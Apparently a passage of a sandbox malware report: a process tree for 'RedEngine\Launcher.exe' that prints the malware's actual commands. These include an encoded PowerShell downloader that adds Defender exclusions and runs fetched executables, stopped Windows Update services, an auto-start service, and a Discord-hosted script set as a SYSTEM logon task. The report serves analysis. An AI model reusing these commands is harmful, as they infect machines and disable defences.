ABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAG4AZwB2ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwB4AG4AbAAjAD4A"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\cuvhmzml.ugn0.exe"C:\Users\Admin\AppData\Roaming\cuvhmzml.ugn0.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\cuvhmzml.ugn1.exe"C:\Users\Admin\AppData\Roaming\cuvhmzml.ugn1.exe"4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart5⤵
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart6⤵
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc5⤵
- Launches sc.exe
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 05⤵
- Power Settings
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 05⤵
- Power Settings
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 05⤵
- Power Settings
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 05⤵
- Power Settings
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe5⤵
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "AAWUFTXN"5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "AAWUFTXN" binpath= "C:\ProgramData\acspebqjhjkn\gjouiuwovvdx.exe" start= "auto"5⤵
- Launches sc.exe
-
C:\Users\Admin\AppData\Roaming\cuvhmzml.ugn2.exe"C:\Users\Admin\AppData\Roaming\cuvhmzml.ugn2.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2353.tmp\2354.tmp\2355.bat C:\Users\Admin\AppData\Roaming\cuvhmzml.ugn2.exe"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\where.exewhere node6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\msiexec.exemsiexec /i nodejs-installer.msi /quiet6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/1249224125830922300/1249224157745516664/index.js?ex=666dc668&is=666c74e8&hm=5dfd52c5327ffb2554e248dcb902443533012613ad4f330995dc83169665440c&' -OutFile 'C:\Users\Admin\AppData\Local\Temp\chrome2\index.js'"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\system32\schtasks.exeschtasks /Create /SC ONLOGON /TN "RunNodeScriptAtLogon" /TR "node.exe 'C:\Users\Admin\AppData\Local\Temp\chrome2\index.js'" /RU SYSTEM /F6⤵
- Scheduled Task/Job: Scheduled Task
-
F:\RedEngine\Launcher.exe"F:\RedEngine\Launcher.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAZwBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdAB6AHkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbABiAHcAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaAByAGQAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAHAAYQBuAGMAZQBrADYAMQAxADEAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbAB0AHcAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBhAGgAZQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBjAHkAdwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAcQBuAHUAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZABpAGYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAG4AZwB2ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwB4AG4AbAAjAD4A"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\vlyixe2m.igg0.exe"C:\Users\Admin\AppData\Roaming\vlyixe2m.igg0.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\vlyixe2m.igg1.exe"C:\Users\Admin\AppData\Roaming\vlyixe2m.igg1.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\vlyixe2m.igg2.exe"C:\Users\Admin\AppData\Roaming\vlyixe2m.igg2.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\68A9.tmp\68AA.tmp\68AB.bat C:\Users\Admin\AppData\Roaming\vlyixe2m.igg2.exe"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\where.exewhere node6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\msiexec.exemsiexec /i nodejs-installer.msi /quiet6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/1249224125830922300/1249224157745516664/index.js?ex=666dc668&is=666c74e8&hm=5dfd52c5327ffb2554e248dcb902443533012613ad4f330995dc83169665440c&' -OutFile 'C:\Users\Admin\AppData\Local\Temp\chrome2\index.js'"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\system32\schtasks.exeschtasks /Create /SC ONLOGON /TN "RunNodeScriptAtLogon" /TR "node.exe 'C:\Users\Admin\AppData\Local\Temp\chrome2\index.js'" /RU SYSTEM /F6⤵
- Scheduled Task/Job: Scheduled Task
-
F:\RedEngine\Launcher.exe"F:\RedEngine\Launcher.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAZwBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdAB6AHkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbABiAHcAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaAByAGQAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAHAAYQBuAGMAZQBrADYAMQAxADEAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbAB0AHcAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBhAGgAZQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBjAHkAdwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAcQBuAHUAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZABpAGYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAG4AZwB2ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwB4AG4AbAAjAD4A"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\ljdnbvmc.shu0.exe"C:\Users\Admin\AppData\Roaming\ljdnbvmc.shu0.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\ljdnbvmc.shu1.exe"C:\Users\Admin\AppData\Roaming\ljdnbvmc.shu1.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\ljdnbvmc.shu2.exe"C:\Users\Admin\AppData\Roaming\ljdnbvmc.shu2.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2A29.tmp\2A2A.tmp\2A2B.bat C:\Users\Admin\AppData\Roaming\ljdnbvmc.shu2.exe"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\where.exewhere node6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\msiexec.exemsiexec /i nodejs-installer.msi /quiet6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/1249224125830922300/1249224157745516664/index.js?ex=666dc668&is=666c74e8&hm=5dfd52c5327ffb2554e248dcb902443533012613ad4f330995dc83169665440c&' -OutFile 'C:\Users\Admin\AppData\Local\Temp\chrome2\index.js'"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\system32\schtasks.exeschtasks /Create /SC ONLOGON /TN "RunNodeScriptAtLogon" /TR "node.exe 'C:\Users\Admin\AppData\Local\Temp\chrome2\index.js'" /RU SYSTEM /F6⤵
- Scheduled Task/Job: Scheduled Task
-
F:\RedEngine\Launcher.exe"F:\RedEngine\Launcher.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAZwBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdAB6AHkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbABiAHcAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaAByAGQAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAHAAYQBuAGMAZQBrADYAMQAxADEAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbAB0AHcAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBhAGgAZQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBjAHkAdwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAcQBuAHUAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZABpAGYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAG4AZwB2ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwB4AG4AbAAjAD4A"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\fto5nvwj.zhv0.exe"C:\Users\Admin\AppData\Roaming\fto5nvwj.zhv0.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\fto5nvwj.zhv1.exe"C:\Users\Admin\AppData\Roaming\fto5nvwj.zhv1.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\fto5nvwj.zhv2.exe"C:\Users\Admin\AppData\Roaming\fto5nvwj.zhv2.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\58BB.tmp\58BC.tmp\58BD.bat C:\Users\Admin\AppData\Roaming\fto5nvwj.zhv2.exe"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\where.exewhere node6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\msiexec.exemsiexec /i nodejs-installer.msi /quiet6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/1249224125830922300/1249224157745516664/index.js?ex=666dc668&is=666c74e8&hm=5dfd52c5327ffb2554e248dcb902443533012613ad4f330995dc83169665440c&' -OutFile 'C:\Users\Admin\AppData\Local\Temp\chrome2\index.js'"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\system32\schtasks.exeschtasks /Create /SC ONLOGON /TN "RunNodeScriptAtLogon" /TR "node.exe 'C:\Users\Admin\AppData\Local\Temp\chrome2\index.js'" /RU SYSTEM /F6⤵
- Scheduled Task/Job: Scheduled Task
-
F:\RedEngine\Launcher.exe"F:\RedEngine\Launcher.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAZwBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdAB6AHkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbABiAHcAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaAByAGQAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAHAAYQBuAGMAZQBrADYAMQAxADEAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbAB0AHcAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBhAGgAZQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBjAHkAdwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAcQBuAHUAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZABpAGYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAG4AZwB2ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwB4AG4AbAAjAD4A"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\41j2jner.kc10.exe"C:\Users\Admin\AppData\Roaming\41j2jner.kc10.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\41j2jner.kc11.exe"C:\Users\Admin\AppData\Roaming\41j2jner.kc11.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\41j2jner.kc12.exe"C:\Users\Admin\AppData\Roaming\41j2jner.kc12.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8B45.tmp\8B46.tmp\8B47.bat C:\Users\Admin\AppData\Roaming\41j2jner.kc12.exe"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\where.exewhere node6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\msiexec.exemsiexec /i nodejs-installer.msi /quiet6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/1249224125830922300/1249224157745516664/index.js?ex=666dc668&is=666c74e8&hm=5dfd52c5327ffb2554e248dcb902443533012613ad4f330995dc83169665440c&' -OutFile 'C:\Users\Admin\AppData\Local\Temp\chrome2\index.js'"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\system32\schtasks.exeschtasks /Create /SC ONLOGON /TN "RunNodeScriptAtLogon" /TR "node.exe 'C:\Users\Admin\AppData\Local\Temp\chrome2\index.js'" /RU SYSTEM /F6⤵
- Scheduled Task/Job: Scheduled Task
-
F:\RedEngine\Launcher.exe"F:\RedEngine\Launcher.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAZwBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdAB6AHkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbABiAHcAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaAByAGQAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAHAAYQBuAGMAZQBrADYAMQAxADEAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIA